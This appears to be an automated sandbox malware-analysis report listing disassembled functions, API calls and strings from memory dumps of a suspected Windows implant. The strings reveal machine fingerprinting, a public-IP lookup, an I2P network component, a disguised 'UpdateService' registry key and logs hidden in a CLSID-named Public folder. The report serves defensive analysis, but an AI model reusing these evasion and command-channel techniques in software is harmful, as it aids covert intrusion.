C:\Windows, xrefs: 00007FFE11EC357D, 00007FFE11EC3670
MachineGuid, xrefs: 00007FFE11EC36B3
[E] (%s) -> RtlGetVersion failed(res=%08lx), xrefs: 00007FFE11EC3504
[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s), xrefs: 00007FFE11EC3685
:, xrefs: 00007FFE11EC36EB
sys_init, xrefs: 00007FFE11EC34FD, 00007FFE11EC3532, 00007FFE11EC359D, 00007FFE11EC367E, 00007FFE11EC3750, 00007FFE11EC378E, 00007FFE11EC3841, 00007FFE11EC38D7, 00007FFE11EC39B0
P, xrefs: 00007FFE11EC37C2
ntdll.dll, xrefs: 00007FFE11EC3494
%, xrefs: 00007FFE11EC3699
9e146be9-c76a-4720-bcdb-53011b87bd06, xrefs: 00007FFE11EC36AC, 00007FFE11EC3780
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE11EC3539
[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu), xrefs: 00007FFE11EC35A4
~, xrefs: 00007FFE11EC37B9
[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s), xrefs: 00007FFE11EC3795
[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu), xrefs: 00007FFE11EC3757
\, xrefs: 00007FFE11EC36F0
, xrefs: 00007FFE11EC3763
SOFTWARE\Microsoft\Cryptography, xrefs: 00007FFE11EC36BA
[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d), xrefs: 00007FFE11EC38DE

Memory Dump Source

Source File: 00000017.00000002.2982869443.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2982773680.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2982917287.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983003921.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983076043.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983101282.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983157453.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
API String ID: 3828489143-883582248
Opcode ID: 51ada386e532f8475c008fe7cb94cea0cf59d83d9d3ce4fff3dcb342ec4b0357
Instruction ID: 17bcc248a9a5fa588ba1b49b82196b18f062142d9cf9d6f43443fe5fbcff63f6
Opcode Fuzzy Hash: 51ada386e532f8475c008fe7cb94cea0cf59d83d9d3ce4fff3dcb342ec4b0357
Instruction Fuzzy Hash: F9D15B62E0CE5381FB2087D7EC403BB6268AB15B74F9920B6D94E177B4DE2DFA448741

Function 00007FFE0E16C25C Relevance: 56.3, APIs: 10, Strings: 22, Instructions: 280
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFE0E16BC64: LoadLibraryA.KERNEL32 ref: 00007FFE0E16BC72

Part of subcall function 00007FFE0E16BBE3: GetProcAddress.KERNEL32 ref: 00007FFE0E16BC03

FreeLibrary.KERNEL32 ref: 00007FFE0E16C2EF
GetNativeSystemInfo.KERNEL32 ref: 00007FFE0E16C33B
GetWindowsDirectoryA.KERNEL32 ref: 00007FFE0E16C354
GetLastError.KERNEL32 ref: 00007FFE0E16C362

Strings

[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s), xrefs: 00007FFE0E16C455
~, xrefs: 00007FFE0E16C589
[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d), xrefs: 00007FFE0E16C787
, xrefs: 00007FFE0E16C533
RtlGetVersion, xrefs: 00007FFE0E16C27C
9e146be9-c76a-4720-bcdb-53011b87bd06, xrefs: 00007FFE0E16C47C, 00007FFE0E16C550
[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d), xrefs: 00007FFE0E16C6AE
\, xrefs: 00007FFE0E16C4C0
ntdll.dll, xrefs: 00007FFE0E16C264
sys_init, xrefs: 00007FFE0E16C2CD, 00007FFE0E16C302, 00007FFE0E16C36D, 00007FFE0E16C44E, 00007FFE0E16C520, 00007FFE0E16C55E, 00007FFE0E16C611, 00007FFE0E16C6A7, 00007FFE0E16C780
[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu), xrefs: 00007FFE0E16C374
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE0E16C309
[E] (%s) -> RtlGetVersion failed(res=%08lx), xrefs: 00007FFE0E16C2D4
[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx), xrefs: 00007FFE0E16C618
MachineGuid, xrefs: 00007FFE0E16C483
[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu), xrefs: 00007FFE0E16C527
P, xrefs: 00007FFE0E16C592
C:\Windows, xrefs: 00007FFE0E16C34D, 00007FFE0E16C440
:, xrefs: 00007FFE0E16C4BB
%, xrefs: 00007FFE0E16C469
[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s), xrefs: 00007FFE0E16C565
SOFTWARE\Microsoft\Cryptography, xrefs: 00007FFE0E16C48A

Memory Dump Source

Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd

Similarity

API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
API String ID: 3828489143-883582248
Opcode ID: f99a8acc4a9a33fd0079e8d835f9253dc811df7188b8601c8e2c5d1f47ab0a84
Instruction ID: 9a21009a62d14b994a68044f21107c697b3decab4d702d90cc32ec2586b63d09
Opcode Fuzzy Hash: f99a8acc4a9a33fd0079e8d835f9253dc811df7188b8601c8e2c5d1f47ab0a84
Instruction Fuzzy Hash: EBD1AD22E0C65B81FB209B99E8443B9A2A0AF48B54F554037CDDE573B2DF2DE88487C1

Function 00007FFE0EB444CC Relevance: 56.3, APIs: 10, Strings: 22, Instructions: 280
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFE0EB44DF4: LoadLibraryA.KERNEL32 ref: 00007FFE0EB44E02

Part of subcall function 00007FFE0EB44D73: GetProcAddress.KERNEL32 ref: 00007FFE0EB44D93

FreeLibrary.KERNEL32 ref: 00007FFE0EB4455F
GetNativeSystemInfo.KERNEL32 ref: 00007FFE0EB445AB
GetWindowsDirectoryA.KERNEL32 ref: 00007FFE0EB445C4
GetLastError.KERNEL32 ref: 00007FFE0EB445D2

Strings

:, xrefs: 00007FFE0EB4472B
[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d), xrefs: 00007FFE0EB4491E
MachineGuid, xrefs: 00007FFE0EB446F3
P, xrefs: 00007FFE0EB44802
~, xrefs: 00007FFE0EB447F9
[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s), xrefs: 00007FFE0EB446C5
[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s), xrefs: 00007FFE0EB447D5
SOFTWARE\Microsoft\Cryptography, xrefs: 00007FFE0EB446FA
[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu), xrefs: 00007FFE0EB44797
[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu), xrefs: 00007FFE0EB445E4
RtlGetVersion, xrefs: 00007FFE0EB444EC
[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx), xrefs: 00007FFE0EB44888
[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d), xrefs: 00007FFE0EB449F7
[E] (%s) -> RtlGetVersion failed(res=%08lx), xrefs: 00007FFE0EB44544
\, xrefs: 00007FFE0EB44730
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE0EB44579
C:\Windows, xrefs: 00007FFE0EB445BD, 00007FFE0EB446B0
sys_init, xrefs: 00007FFE0EB4453D, 00007FFE0EB44572, 00007FFE0EB445DD, 00007FFE0EB446BE, 00007FFE0EB44790, 00007FFE0EB447CE, 00007FFE0EB44881, 00007FFE0EB44917, 00007FFE0EB449F0
ntdll.dll, xrefs: 00007FFE0EB444D4
%, xrefs: 00007FFE0EB446D9
9e146be9-c76a-4720-bcdb-53011b87bd06, xrefs: 00007FFE0EB446EC, 00007FFE0EB447C0
, xrefs: 00007FFE0EB447A3

Memory Dump Source

Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd

Similarity

API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
API String ID: 3828489143-883582248
Opcode ID: b5fd4e9562417732fdaa0dbba0e05c9de88ec29756765ebe4ed71ec975986126
Instruction ID: 0d3cb7bae7c722bdea4c8a160afb3a3c755e7bf65431e18453957106969c38ed
Opcode Fuzzy Hash: b5fd4e9562417732fdaa0dbba0e05c9de88ec29756765ebe4ed71ec975986126
Instruction Fuzzy Hash: 2ED16CA2E0C76381FB709F58E8403B966A0EF80B54F550132D9EE176B0DE2CE894CF81

Function 00007FF6EF6528FC Relevance: 52.8, APIs: 10, Strings: 20, Instructions: 280
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6EF652304: LoadLibraryA.KERNEL32(?,?,service,000001FC7A4F13D0,00007FF6EF652910), ref: 00007FF6EF652312

Part of subcall function 00007FF6EF652283: GetProcAddress.KERNEL32(?,?,00000000,000001FC7A4F13D0,?,00007FF6EF65292B), ref: 00007FF6EF6522A3

FreeLibrary.KERNEL32 ref: 00007FF6EF65298F
GetNativeSystemInfo.KERNEL32 ref: 00007FF6EF6529DB
GetWindowsDirectoryA.KERNEL32 ref: 00007FF6EF6529F4
GetLastError.KERNEL32 ref: 00007FF6EF652A02

Strings

[E] (%s) -> RtlGetVersion failed(res=%08lx), xrefs: 00007FF6EF652974
ntdll.dll, xrefs: 00007FF6EF652904
[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s), xrefs: 00007FF6EF652AF5
service, xrefs: 00007FF6EF6528FF
[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu), xrefs: 00007FF6EF652A14
:, xrefs: 00007FF6EF652B5B
[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d), xrefs: 00007FF6EF652D4E
SOFTWARE\Microsoft\Cryptography, xrefs: 00007FF6EF652B2A
[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx), xrefs: 00007FF6EF652CB8
MachineGuid, xrefs: 00007FF6EF652B23
[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu), xrefs: 00007FF6EF652BC7
[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d), xrefs: 00007FF6EF652E27
[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s), xrefs: 00007FF6EF652C05
%, xrefs: 00007FF6EF652B09
\, xrefs: 00007FF6EF652B60
[E] (%s) -> Failed(err=%08x), xrefs: 00007FF6EF6529A9
9e146be9-c76a-4720-bcdb-53011b87bd06, xrefs: 00007FF6EF652B1C, 00007FF6EF652BF0
sys_init, xrefs: 00007FF6EF65296D, 00007FF6EF6529A2, 00007FF6EF652A0D, 00007FF6EF652AEE, 00007FF6EF652BC0, 00007FF6EF652BFE, 00007FF6EF652CB1, 00007FF6EF652D47, 00007FF6EF652E20
RtlGetVersion, xrefs: 00007FF6EF65291C
C:\Windows, xrefs: 00007FF6EF6529ED, 00007FF6EF652AE0

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
String ID: %$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$service$sys_init
API String ID: 3828489143-3798070276
Opcode ID: ffc509cf212cb316355f02b237155ff1aacdd6f990e522e90fbe1568e07fe90a
Instruction ID: 9d1c9713298b5e3d6fe9461287b3b40114838231a49a0ecc297ce874b6864fb8
Opcode Fuzzy Hash: ffc509cf212cb316355f02b237155ff1aacdd6f990e522e90fbe1568e07fe90a
Instruction Fuzzy Hash: 2FD18F63E1C65387FB208795E4803B92358AF40754F160936D94EE7793DE2FE984A38B

Function 00007FFE126DBC77 Relevance: 39.4, APIs: 8, Strings: 18, Instructions: 376
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE126DC313
-VRSCNC-, xrefs: 00007FFE126DC231
-ILCCNC-, xrefs: 00007FFE126DC1D2
curl/8.4.0, xrefs: 00007FFE126DBF9D
--TSCB--, xrefs: 00007FFE126DC241
/line?fields=query, xrefs: 00007FFE126DBF89
AKAK, xrefs: 00007FFE126DC1C7
ip-api.com, xrefs: 00007FFE126DBF96
-ILCCNC-, xrefs: 00007FFE126DBDD7
last-patch, xrefs: 00007FFE126DBEAC
TPCR, xrefs: 00007FFE126DBD0F
AKAK, xrefs: 00007FFE126DBD08
mem_alloc, xrefs: 00007FFE126DC30C
Referer, xrefs: 00007FFE126DBED2
KCIT, xrefs: 00007FFE126DBCA3
SYSTEM\CurrentControlSet\Services\UpdateService\Parameters, xrefs: 00007FFE126DBED9
-ILCCNC-, xrefs: 00007FFE126DBC89
, xrefs: 00007FFE126DC1BC

Memory Dump Source

Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true

Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd

Similarity

API ID:
String ID: $--TSCB--$-ILCCNC-$-ILCCNC-$-ILCCNC-$-VRSCNC-$/line?fields=query$AKAK$AKAK$KCIT$Referer$SYSTEM\CurrentControlSet\Services\UpdateService\Parameters$TPCR$[E] (%s) -> Memory allocation failed(size=%llu)$curl/8.4.0$ip-api.com$last-patch$mem_alloc
API String ID: 0-4235120829
Opcode ID: b111abc97e8844963aa1c4367b10b26ec1e4f214c1298f9732ba1d066dde872b
Instruction ID: d46986ba588fec433de7ac57b6a541478aa85c2f74e2a98bc7c7700379b5ba5f
Opcode Fuzzy Hash: b111abc97e8844963aa1c4367b10b26ec1e4f214c1298f9732ba1d066dde872b
Instruction Fuzzy Hash: A2127061A08F8E87EA60CB1AEC403B963A4EB84764F504276DA9D477F9DFBCE445C740

Function 00007FFE126DA670 Relevance: 37.7, APIs: 9, Strings: 16, Instructions: 167
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFE126D7734: LoadLibraryA.KERNEL32 ref: 00007FFE126D7742

Part of subcall function 00007FFE126D7400: GetModuleHandleExA.KERNEL32 ref: 00007FFE126D741E

strlen.MSVCRT ref: 00007FFE126DA7C8
strlen.MSVCRT ref: 00007FFE126DA7E4
strcat.MSVCRT ref: 00007FFE126DA800
strlen.MSVCRT ref: 00007FFE126DA808
strcat.MSVCRT ref: 00007FFE126DA82F
strlen.MSVCRT ref: 00007FFE126DA837
strcat.MSVCRT ref: 00007FFE126DA855
strlen.MSVCRT ref: 00007FFE126DA85D
strlen.MSVCRT ref: 00007FFE126DA877

Strings

libi2p.dll, xrefs: 00007FFE126DA762
[I] (%s) -> %s, xrefs: 00007FFE126DA94C
i2p, xrefs: 00007FFE126DA83C
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE126DA972
i2p_init, xrefs: 00007FFE126DA945, 00007FFE126DA96B
i2p, xrefs: 00007FFE126DA92E
--datadi, xrefs: 00007FFE126DA6B4
i2p.su3, xrefs: 00007FFE126DA899
C_StartI2P, xrefs: 00007FFE126DA907
--reseed, xrefs: 00007FFE126DA6E9
i2p.su3, xrefs: 00007FFE126DA862
.file=, xrefs: 00007FFE126DA6F3
Done, xrefs: 00007FFE126DA93E
i2p.conf, xrefs: 00007FFE126DA810
C_InitI2P, xrefs: 00007FFE126DA8E8
--conf=, xrefs: 00007FFE126DA67A

Memory Dump Source

Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true

Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd

Similarity

API ID: strlen$strcat$HandleLibraryLoadModule
String ID: --conf=$--datadi$--reseed$.file=$C_InitI2P$C_StartI2P$Done$[E] (%s) -> Failed(err=%08x)$[I] (%s) -> %s$i2p$i2p$i2p.conf$i2p.su3$i2p.su3$i2p_init$libi2p.dll
API String ID: 1893813203-492052463
Opcode ID: 57d5711ee8427bd87ee575909a0cf410c33c3c401ab1fb1fa258222903a299b0
Instruction ID: f19ecf81e1923d2108b5661a85aaa431a10e205d9be934d4a033093310cc85ff
Opcode Fuzzy Hash: 57d5711ee8427bd87ee575909a0cf410c33c3c401ab1fb1fa258222903a299b0
Instruction Fuzzy Hash: 04719F3161CF8A82EB219B16E9503FE6395EB84790F440171DA8D4B7E9EFBCD905C780

Function 00007FFE1338221C Relevance: 36.9, APIs: 8, Strings: 13, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE1338223C
GetLastError.KERNEL32 ref: 00007FFE13382370

Part of subcall function 00007FFE13384E20: GetModuleHandleExA.KERNEL32 ref: 00007FFE13384E3E

strlen.MSVCRT ref: 00007FFE1338228E
strlen.MSVCRT ref: 00007FFE133822AA
strcat.MSVCRT ref: 00007FFE133822C5
strlen.MSVCRT ref: 00007FFE133822CD
strlen.MSVCRT ref: 00007FFE133822E2
fopen.MSVCRT ref: 00007FFE13382308

Strings

[I] (%s) -> Log open success(flog_path=%s), xrefs: 00007FFE13382335
~, xrefs: 00007FFE133823F5
log, xrefs: 00007FFE133822F7
debug_init, xrefs: 00007FFE1338232E, 00007FFE13382353, 00007FFE1338237B, 00007FFE13382440, 00007FFE133824B4
Done, xrefs: 00007FFE133824AD
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log, xrefs: 00007FFE1338226E, 00007FFE13382284, 00007FFE133822BB, 00007FFE133822D8, 00007FFE13382327
[I] (%s) -> %s, xrefs: 00007FFE133824BB
[E] (%s) -> Log open failed(flog_path=%s), xrefs: 00007FFE13382447
evtsrv.l, xrefs: 00007FFE133822EA
, xrefs: 00007FFE1338238E
P, xrefs: 00007FFE133823FA
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE1338235A
[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu), xrefs: 00007FFE13382382

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$evtsrv.l$log$~
API String ID: 3395718042-190452282
Opcode ID: c05900a8507ee543a62eed4c6a185f04896fe9d0da75e948d3abfafb94edaaae
Instruction ID: dd9eb3b6ca7b60ab503c85f840b7aed3102538302fd654b053c2b8eaa8b966c6
Opcode Fuzzy Hash: c05900a8507ee543a62eed4c6a185f04896fe9d0da75e948d3abfafb94edaaae
Instruction Fuzzy Hash: A5513E50E0CE03DDFA109B13A4903BC5652AF75764F5002F2D92EB7AB2DE6DA9C58319

Function 00007FFE0E13427C Relevance: 36.9, APIs: 8, Strings: 13, Instructions: 139
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE0E13429C
GetLastError.KERNEL32 ref: 00007FFE0E1343D0

Part of subcall function 00007FFE0E132700: GetModuleHandleExA.KERNEL32 ref: 00007FFE0E13271E

strlen.MSVCRT ref: 00007FFE0E1342EE
strlen.MSVCRT ref: 00007FFE0E13430A
strcat.MSVCRT ref: 00007FFE0E134325
strlen.MSVCRT ref: 00007FFE0E13432D
strlen.MSVCRT ref: 00007FFE0E134342
fopen.MSVCRT ref: 00007FFE0E134368

Strings

[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE0E1343BA
, xrefs: 00007FFE0E1343EE
Done, xrefs: 00007FFE0E13450D
P, xrefs: 00007FFE0E13445A
[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu), xrefs: 00007FFE0E1343E2
debug_init, xrefs: 00007FFE0E13438E, 00007FFE0E1343B3, 00007FFE0E1343DB, 00007FFE0E1344A0, 00007FFE0E134514
[I] (%s) -> Log open success(flog_path=%s), xrefs: 00007FFE0E134395
samctl.l, xrefs: 00007FFE0E13434A
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log, xrefs: 00007FFE0E1342CE, 00007FFE0E1342E4, 00007FFE0E13431B, 00007FFE0E134338, 00007FFE0E134387
~, xrefs: 00007FFE0E134455
log, xrefs: 00007FFE0E134357
[E] (%s) -> Log open failed(flog_path=%s), xrefs: 00007FFE0E1344A7
[I] (%s) -> %s, xrefs: 00007FFE0E13451B

Memory Dump Source

Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true

Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd

